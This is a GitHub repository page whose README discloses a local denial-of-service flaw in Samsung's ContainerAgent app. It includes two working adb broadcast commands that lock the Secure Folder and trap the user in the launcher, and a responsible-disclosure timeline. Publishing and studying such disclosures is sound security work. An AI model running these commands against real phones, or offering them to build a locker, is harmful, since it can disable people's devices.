Skip to content
Samsung ContainerAgent Vulnerability - Local DoS for Samsung smartphone
Branch: master
Clone or download
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
app Initial contribution May 12, 2019
gradle/wrapper Initial contribution May 12, 2019
README.md Add write up link in README.md May 15, 2019
build.gradle Initial contribution May 12, 2019
gradle.properties Initial contribution May 12, 2019
gradlew Initial contribution May 12, 2019
gradlew.bat Initial contribution May 12, 2019
settings.gradle Initial contribution May 12, 2019

README.md

Samsung ContainerAgent Vulnerability

Due to an unprotected intent in the ContainerAgent app, a Samsung smartphone can become temporarily bricked. This vulnerability can be used to create a Locker.

A write up has been published on Medium: https://medium.com/@fs0c131y/how-to-brick-all-samsung-phones-6aae4389bea?source=friends_link&sk=d044380dfde02c588fdab07d67720f2b

How To

Lock Secure folder

adb shell am broadcast -a com.samsung.android.knox.containeragent.LocalCommandReceiver.ACTION_COMMAND --ei "com.samsung.android.knox.containeragent.LocalCommandReceiver.EXTRA_COMMAND_ID" 1001 --ei "android.intent.extra.user_handle" 150

Go back to launcher

adb shell am broadcast -a com.samsung.android.knox.containeragent.LocalCommandReceiver.ACTION_COMMAND --ei "com.samsung.android.knox.containeragent.LocalCommandReceiver.EXTRA_COMMAND_ID" 1002 --ei "android.intent.extra.user_handle" 0

Result

The user will be stuck in the launcher and his Secure Folder will be locked all the time.

Disclosure

  • 04/02/19: Initial finding by @fs0c131y
  • 11/03/19: Responsible disclosure to the Samsung Security Team
  • 18/03/19: The Samsung Security Team considered this issue as no/little security impact

Contact

Follow me on Twitter! You can also find a small part of my work at https://fs0c131y.com

Credits

The investigation and the POC has been made with ❤ by @fs0c131y

You can’t perform that action at this time.